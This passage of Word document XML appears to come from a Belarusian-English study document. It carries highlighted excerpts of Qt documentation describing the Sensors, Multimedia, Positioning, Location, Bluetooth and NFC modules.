          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">у </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>можна ствараць веб-інтэрфэйсы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2684" w:name="sensors-gestures-and-touch-interfaces"/>
      <w:bookmarkStart w:id="2685" w:name="_Toc483001117"/>
      <w:bookmarkStart w:id="2686" w:name="_Toc483004086"/>
      <w:bookmarkStart w:id="2687" w:name="_Toc483604450"/>
      <w:bookmarkStart w:id="2688" w:name="_Toc483605670"/>
      <w:bookmarkEnd w:id="2684"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sensors, Gestures, and Touch Interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2685"/>
      <w:bookmarkEnd w:id="2686"/>
      <w:bookmarkEnd w:id="2687"/>
      <w:bookmarkEnd w:id="2688"/>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The </w:t>
      </w:r>
      <w:hyperlink r:id="rId2983" w:history="1">
        <w:r w:rsidRPr="00F06D42">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Sensors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows applicat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ions to read information from sensors such as accelerometers and tilt sensors</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. There is a common QML API for different platforms and can be extended in C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2984" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Sensors QML Types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2985" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Sensors Examples</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2986" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Compatibility Map</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - lists support level for different mobile platforms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2689" w:name="multimedia-content"/>
      <w:bookmarkStart w:id="2690" w:name="_Toc483001118"/>
      <w:bookmarkStart w:id="2691" w:name="_Toc483004087"/>
      <w:bookmarkStart w:id="2692" w:name="_Toc483604451"/>
      <w:bookmarkStart w:id="2693" w:name="_Toc483605671"/>
      <w:bookmarkEnd w:id="2689"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multimedia Content</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2690"/>
      <w:bookmarkEnd w:id="2691"/>
      <w:bookmarkEnd w:id="2692"/>
      <w:bookmarkEnd w:id="2693"/>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2987" w:history="1">
        <w:r w:rsidRPr="00F06D42">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Multimedia</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module enables applications to handle various media content with a convenient set of QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These QML types can be extended in C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2988" w:anchor="multimedia" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Multimedia</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2989" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Audio Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2990" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Video Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2991" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Camera Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2992" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Radio Overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2993" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Audio Engine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - for 3D positional audio playback and content management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2694" w:name="mobile-devices"/>
      <w:bookmarkStart w:id="2695" w:name="_Toc483001119"/>
      <w:bookmarkStart w:id="2696" w:name="_Toc483004088"/>
      <w:bookmarkStart w:id="2697" w:name="_Toc483604452"/>
      <w:bookmarkStart w:id="2698" w:name="_Toc483605672"/>
      <w:bookmarkEnd w:id="2694"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mobile Devices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2695"/>
      <w:bookmarkEnd w:id="2696"/>
      <w:bookmarkEnd w:id="2697"/>
      <w:bookmarkEnd w:id="2698"/>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 xml:space="preserve">Several Qt modules </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provide QML APIs for networked and mobile devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The QML types provide access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Near-Field Communications (NFC), </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPS-enabled devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2994" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Positioning</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2995" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Location</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2996" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Bluetooth</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2997" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt NFC</w:t>
        </w:r>
      </w:hyperlink>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For more information, visit the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2998" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Networking and Connectivity</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId2999" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mobile APIs</w:t>
        </w:r>
